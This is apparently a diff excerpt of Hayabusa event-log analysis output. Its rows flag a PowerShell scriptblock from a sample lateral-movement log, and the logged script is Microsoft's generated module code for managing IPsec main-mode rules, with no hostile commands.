+2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'c",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'c",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"im:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeRule' -Alias '*' function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] 